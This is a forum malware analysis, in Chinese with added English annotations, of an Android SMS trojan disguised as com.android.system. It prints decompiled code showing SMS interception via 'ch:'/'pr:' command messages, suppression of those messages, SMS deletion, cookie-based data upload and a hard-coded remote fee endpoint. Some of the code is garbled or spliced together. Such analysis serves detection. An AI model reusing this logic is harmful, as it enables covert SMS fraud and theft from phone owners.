apk病毒样本分析
一.基本信息
文件名称: Update.apk
MD5: 396ecd933e52403c645c1241de501696
Sha-1: 29051ca16672b9cb2b5940cc2e0d8feeb6a51262
应用名称: Audience
文件包名: com.android.system
二.AndroidManifest.xml
<receiver android:label="@string/app_name" android:name=".Audiencer">
<intent-filter android:priority="2147483647">
<action android:name="android.intent.action.BOOT_COMPLETED" />
<action android:name="android.intent.action.NEW_OUTGOING_CALL" />
<action android:name="android.intent.action.SCREEN_OFF" />
<action android:name="android.intent.action.SCREEN_ON" />
<action android:name="android.provider.Telephony.SMS_RECEIVED" />
</intent-filter>
</receiver>
<service android:name=".Audience" />//启动的服务
</application>
<uses-permission android:name="android.permission.INTERNET" />//联网
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />//访问网络状态
<uses-permission android:name="android.permission.WRITE_APN_SETTINGS" />//改写APN设置
<uses-permission android:name="android.permission.WRITE_APN_SETTING" />
<uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />//访问wifi
<uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />//开机开启广播
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.READ_SMS" />//读信息
<uses-permission android:name="android.permission.WRITE_SMS" />//写信息
<uses-permission android:name="android.permission.SEND_SMS" />//发信息
<uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" />//监视,修改有关拨出电话
<uses-permission android:name="android.permission.WAKE_LOCK" />//手机屏幕关闭后后台进程仍然运行
<uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS" />//挂载、反挂载外部文件系统
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />//写sd卡
<uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" />
<uses-permission android:name="android.permission.READ_LOGS" />//读取系统日志
<uses-permission android:name="android.permission.KILL_BACKGROUND_PROCESSES" />//关闭后台程序
<uses-permission android:name="android.permission.RESTART_PACKAGES" />//重启程序
<uses-permission android:name="android.permission.READ_PHONE_STATE" />//读取电话状态
</manifest>
三.分析
1)安装完后,重新开机,验证其具有开机启动,启动对象为.Audiencer,伪装包名为:com.android.system
http://www.52pojie.cn/forum.php?mod=image&aid=271543&size=300x300&key=c31da3bf5709cec5&nocache=yes&type=fixnone同时具有:屏幕关闭时启动服务,监控短信(收到短信)启动服务2)BroadcastReceiver:Audiencerpublic void onReceive(Context paramContext, Intent paramIntent)
{
// Analyst note: this is decompiler output and is not compilable Java. The control flow is mangled
// ("while (true) { ...; break; }" wrappers, statements after "return", array indexes dropped at
// "new SmsMessage" and "createFromPdu"), and from "Audience.e().b(...)" onward the rest of the
// method is fused onto one physical line where the first "//" comment swallows the remaining code.
// Visible behaviour: every received action is written to the error log; an Intent for the
// Audience service is prepared lazily; on SMS_RECEIVED the "pdus" extra is unpacked and the
// message body is tested for the "ch:" and "pr:" prefixes, which are consumed and the ordered
// broadcast aborted (abortBroadcast) so lower-priority receivers such as the messaging app do
// not see them; other messages are handed to Audience.e().k() (semantics not shown on this page);
// the SCREEN_ON / SCREEN_OFF branches call into the service and call startService(this.a).
// Each startService(this.a) call sits behind a test of the static flag Audience.a, but the
// garbling makes the exact condition unclear.
// Detection angle: a receiver in a package named com.android.system that registers SMS_RECEIVED
// at priority 2147483647 (see the manifest above) and calls abortBroadcast() is the key indicator.
int i = 0;
Log.e(Audiencer.class.getSimpleName(), paramIntent.getAction()); // logs every action delivered to the receiver
if (this.a == null)
{
this.a = new Intent();
this.a.setClass(paramContext, Audience.class);// Intent pointing at the Audience service; the startService(this.a) calls below use it
}
if ("android.provider.Telephony.SMS_RECEIVED".equals(paramIntent.getAction()))// an SMS was received
{
Object[] arrayOfObject = (Object[])paramIntent.getExtras().get("pdus");
SmsMessage[] arrayOfSmsMessage;
if ((arrayOfObject != null) && (arrayOfObject.length > 0))
arrayOfSmsMessage = new SmsMessage; // decompiler dropped the array dimension here
for (int j = 0; ; j++)
{
if (j >= arrayOfObject.length)
{
int k = arrayOfSmsMessage.length;
if (i < k)
break;
return;
}
arrayOfSmsMessage = SmsMessage.createFromPdu((byte[])arrayOfObject); // indexes lost in decompilation; presumably arrayOfSmsMessage[j] and arrayOfObject[j]
}
SmsMessage localSmsMessage = arrayOfSmsMessage; // presumably arrayOfSmsMessage[i]
String str1 = localSmsMessage.getMessageBody();
String str2 = localSmsMessage.getOriginatingAddress();
if (str1.startsWith("ch:"))// intercepts SMS whose body starts with "ch:"; the author reports the remainder is a URL that is written to the database
{
Audience.e().a(str1.substring(3));
abortBroadcast();
return;
}
if (str1.startsWith("pr:"))// intercepts SMS whose body starts with "pr:" and records the mobile number carried after the prefix
{
Audience.e().b(str1.substring(3));//records each received mobile number into a HashMap, finally written to the database abortBroadcast();return;}Audience.e().c().a("SmsReceiver mobile:" + str2 + "content:" + str1);if (Audience.e().k().a(str2, str1, null))//str2 is the sender number, str1 the message body {System.out.println("need response");Audience.e().k().b(str1);//str1 is the message body switch (Audience.e().k().a().g()){ case 3: default: case 0: case 1: case 2:}} while (true) { i++; break; abortBroadcast(); continue; abortBroadcast(); continue; abortBroadcast(); if (!Audience.e().k().a().a(str2, str1)) continue; a.a.f.a(Audience.e().k().a().a(str2), Audience.e().k().a(str1));//sends a message (per the original author) } } Log.e("Process", "service is:" + Audience.e()); if (Audience.e() != null) if ("android.intent.action.SCREEN_ON".equals(paramIntent.getAction()))//when the screen turns on Log.e("Receiver", "Screen_ON"); while (true) { try { Audience.e().o(); } catch (Exception localException1) { try { if (!Audience.a) continue; Audience.e().m(); if (Audience.a) break; Log.e("Process", "Start Service By Dial Or Start up"); paramContext.startService(this.a); return; localException1 = localException1; localException1.printStackTrace(); continue; } catch (Exception localException2) { localException2.printStackTrace(); continue; } } if (!"android.intent.action.SCREEN_OFF".equals(paramIntent.getAction()))//when the screen turns off continue; Log.e("Receiver", "Screen_OFF"); if (Audience.a) { paramContext.startService(this.a);//screen off: start the service Log.e("Process", "Start Service"); } Audience.e().l(); continue; if (!Audience.a) continue; Log.e("Process", "Start Service By Dial Or Start up"); paramContext.startService(this.a); }
}
{
3)拦截信息,获取记录接受到每1位mobile号public final void b(String paramString)//records the mobile number received in the message (letter-encoded, decoded below)
{
// Analyst note (decompiler output, loop structure mangled): walks paramString one character at a
// time and maps the letters 'a'..'j' (char codes 97..106) to the digits '0'..'9', then hands the
// decoded digit string to c(...). In other words the number in a "pr:" message arrives
// letter-encoded; characters outside 'a'..'j' appear to be skipped (nothing is appended).
// Paste damage: the lines from "public final void b(String paramString)//..." through its closing
// "}" below are a different method (the SMS-job one, shown again under heading 3) spliced into the
// middle of this one; the "if (i2 == 103)" branch resumes at "localStringBuffer.append('6')".
StringBuffer localStringBuffer = new StringBuffer();
int i1 = 0;
if (i1 >= paramString.length())
{
c(localStringBuffer.toString()); // decoded digits go to c(...), not shown on this page
return;
}
int i2 = paramString.charAt(i1);
if (i2 == 97) // 'a'
localStringBuffer.append('0');
while (true)
{
i1++;
break;
if (i2 == 98) // 'b'
{
localStringBuffer.append('1');
continue;
}
if (i2 == 99) // 'c'
{
localStringBuffer.append('2');
continue;
}
if (i2 == 100) // 'd'
{
localStringBuffer.append('3');
continue;
}
if (i2 == 101) // 'e'
{
localStringBuffer.append('4');
continue;
}
if (i2 == 102) // 'f'
{
localStringBuffer.append('5');
continue;
}
if (i2 == 103)public final void b(String paramString)//paramString is the SMS body (start of the spliced-in method)
{
// Analyst note: presumably dispatches an SMS job; this.c, this.a and this.d are fields of the
// enclosing class that are not shown on this page, so their types and roles are unknown here.
Log.e("waitForSmsJob", this.c);
if (this.c != null)
{
if ((this.a.l() == null) || (this.a.l().trim().length() == 0))
this.c.a(this.d);
}
else
return;
this.c.a(c(paramString));// j.a(c(paramString)) -- paramString is the message body; waits for a message and processes its content
}
{
localStringBuffer.append('6'); // 'g' (103)
continue;
}
if (i2 == 104) // 'h'
{
localStringBuffer.append('7');
continue;
}
if (i2 == 105) // 'i'
{
localStringBuffer.append('8');
continue;
}
if (i2 != 106) // anything but 'j' is skipped
continue;
localStringBuffer.append('9');
}
3)对接收到的命令信息执行:public final void b(String paramString)//paramString is the SMS body
{
// Analyst note (decompiler output): if the job object this.c exists, it is first given this.d when
// this.a.l() is null or blank, and then the processed message content c(paramString); when this.c
// is null the method returns without doing anything. this.c, this.a and this.d are fields of the
// enclosing class not shown on this page, so their types and roles are unknown here.
Log.e("waitForSmsJob", this.c);
if (this.c != null)
{
if ((this.a.l() == null) || (this.a.l().trim().length() == 0))
this.c.a(this.d);
}
else
return;
this.c.a(c(paramString));// j.a(c(paramString)) -- paramString is the message body; waits for a message and processes its content
}
4)数据库Audience.db进行信息记录 public final void onCreate(SQLiteDatabase paramSQLiteDatabase)
{
// Analyst note (decompiler output; the "if (i >= 18)" / "while (true)" shape is a mangled loop):
// creates the config table "sysapp" (_id, config varchar(2048)) and seeds this.b with the
// sample's default settings: timers (next_work_time from Audience.e().j(), next_work_time2),
// an 18-digit random "pid" built from Random.nextInt(10), empty reply/response/change fields,
// "fee_host" holding a hard-coded remote endpoint string, and "phs", an opaque base64-looking
// blob that is not decoded on this page. The map is then serialised as key[=]value pairs (the
// separator here is append(""), so the real delimiter was probably lost in decompilation or in
// the paste) and inserted as one row with _id=1. Any failure is only logged via a(...).
// Detection angle: the "sysapp" table name, the "[=]" pair format and the fee_host string are
// stable artifacts of this sample.
a("DBOpenHelper onCreate");
try
{
paramSQLiteDatabase.execSQL("CREATE TABLE IF NOT EXISTS sysapp (_id integer primary key, config varchar (2048))");
this.b.put("next_work_time", Audience.e().j());
this.b.put("next_work_time2", "86400");
Map localMap = this.b;
Random localRandom = new Random();
StringBuffer localStringBuffer1 = new StringBuffer(""); // collects the 18 random digits of "pid"
int i = 0;
ContentValues localContentValues;
StringBuffer localStringBuffer2;
Iterator localIterator;
if (i >= 18)
{
localMap.put("pid", localStringBuffer1.toString());// the remaining entries are the command/response settings
this.b.put("response_to_who", "");
this.b.put("reply_response_to_who", "");
this.b.put("reply_response_to_what", "");
this.b.put("response_type", "3");
this.b.put("remain_time", "0");
this.b.put("mobile", "");
this.b.put("start_time", "0");
this.b.put("response_to_what", "");
this.b.put("change_to_who", "");
this.b.put("change_to_what", "");
this.b.put("reply_who", "");
this.b.put("reply_what", "");
this.b.put("content_cutter", "");
this.b.put("heart_beat", "0");
this.b.put("heart_beat_last_work", "0");
this.b.put("heart_beat_last_work2", "0");
this.b.put("heart_beat_start_block", "0");
this.b.put("fee_host", "post://g.kong-mobile.com:8000/g"); // hard-coded remote endpoint string; scheme "post://" is the sample's own convention
this.b.put("work_count", "0");
this.b.put("phs", "YLsLcpcCe/qnwGUFzsr1vqeJqOUyka1A8WL4ZxiyNcOkgpVRFz9gC2UqVBCL K6Q5DQUSoGYjikdAqMlU9btuXnN2sDCAo6vugMP9PTHnEFNb2egaNqWvmj95 y2DagjgP96SxsoOC3mCtXV29EJ7GaIkeBx3klqrZ0jgQgqWyRYVE5HvsXBRo Y/Jp9H3u8oBh1Tcb6JD+Sd423xm6PKnkobISdYPR/pQEW8nOh8LRy/Qhfvev xcHAPmzcWngvxCP3sJl3HtIDgltBjXtN1ehMLSgyP7HOsx9kGaYZBIx9zHh5 rYsjR2s5Uu+ljB1Hd3X+VxL+nYIA8g1QD/mcOcUUC3sPgiCeQo+q/Z1p/XbH Sd4fUidWEbEXtH3fbyrYQEZZUq5t6QAaganu3qiDqefSaFJuTDJOoWnFwGPV 36sl3NSY1QOamu9cVaBOv+yT8d7XxmQuCjoDBCQl6Py5y/MHGl+wQSdkxIX4 X+bkUS2GKFvoF+dYyMGIr5pxSqBbnFjZ"); // opaque blob, looks base64-encoded; not decoded on this page
localContentValues = new ContentValues();
localContentValues.put("_id", Integer.valueOf(1));
localStringBuffer2 = new StringBuffer();
localIterator = this.b.entrySet().iterator();
}
while (true)
{
if (!localIterator.hasNext())
{
localContentValues.put("config", localStringBuffer2.toString()); // whole map stored as one string in the "config" column
paramSQLiteDatabase.insert("sysapp", null, localContentValues);
a("DBOpenHelper.onCreate " + localStringBuffer2.toString());
return;
localStringBuffer1.append(localRandom.nextInt(10)); // unreachable as printed: belongs to the 18-digit pid loop
i++;
break;
}
Map.Entry localEntry = (Map.Entry)localIterator.next();
if (localStringBuffer2.length() != 0)
localStringBuffer2.append(""); // no-op separator; see note above
localStringBuffer2.append((String)localEntry.getKey()).append("[=]").append((String)localEntry.getValue());
}
}
catch (Exception localException)
{
a("DBOpenHelper.onCreate " + localException.toString());
}
}
对应数据库表sysapp记录各种操作信息(每行一个 key[=]value):
next_work_time2[=]86400
response_to_what[=]
work_count[=]2
reply_response_to_who[=]
heart_beat_start_block[=]0
reply_response_to_what[=]
pid[=]880085661072784632
heart_beat[=]374
remain_time[=]0
response_to_who[=]
next_work_time[=]180
heart_beat_last_work[=]374
fee_host[=]post://g.kong-mobile.com:8000/g
content_cutter[=]
response_type[=]3
phs[=]YLsLcpcCe/qnwGUFzsr1vqeJqOUyka1A8WL4ZxiyNcOkgpVRFz9gC2UqVBCL K6Q5DQUSoGYjikdAqMlU9btuXnN2sDCAo6vugMP9PTHnEFNb2egaNqWvmj95 y2DagjgP96SxsoOC3mCtXV29EJ7GaIkeBx3klqrZ0jgQgqWyRYVE5HvsXBRo Y/Jp9H3u8oBh1Tcb6JD+Sd423xm6PKnkobISdYPR/pQEW8nOh8LRy/Qhfvev xcHAPmzcWngvxCP3sJl3HtIDgltBjXtN1ehMLSgyP7HOsx9kGaYZBIx9zHh5 rYsjR2s5Uu+ljB1Hd3X+VxL+nYIA8g1QD/mcOcUUC3sPgiCeQo+q/Z1p/XbH Sd4fUidWEbEXtH3fbyrYQEZZUq5t6QAaganu3qiDqefSaFJuTDJOoWnFwGPV 36sl3NSY1QOamu9cVaBOv+yT8d7XxmQuCjoDBCQl6Py5y/MHGl+wQSdkxIX4 X+bkUS2GKFvoF+dYyMGIr5pxSqBbnFjZ
change_to_who[=]
reply_what[=]
reply_who[=]
change_to_what[=]
heart_beat_last_work2[=]0
start_time[=]0
mobile[=]
5)模块a/a/f有对信息的修改、删除操作等:
paramContentResolver.delete(Uri.parse("content://sms"), " _id = " + paramInt, null);
paramContentResolver.update(Uri.parse("content://sms"), localContentValues, " _id = " + paramInt, null);
6)a/b/b模块具有联网,以cookies形式上传信息操作:
setRequestProperty("Cookie", localStringBuffer.toString());
简单分析,大牛勿喷{:301_1007:} 不错,吾爱有你更精彩 学习了感谢分享经验 谢谢楼主分享技术分析,我受益匪浅 安卓的病毒就是多 大神 膜拜 宿命棋局 发表于 2014-4-20 08:53
不错,吾爱有你更精彩
谢谢。。。。。。。。。 还利用安卓的漏洞 隐藏了在应用程序里面的包 我的手机就会莫名其妙的发短信 学习学习 。。。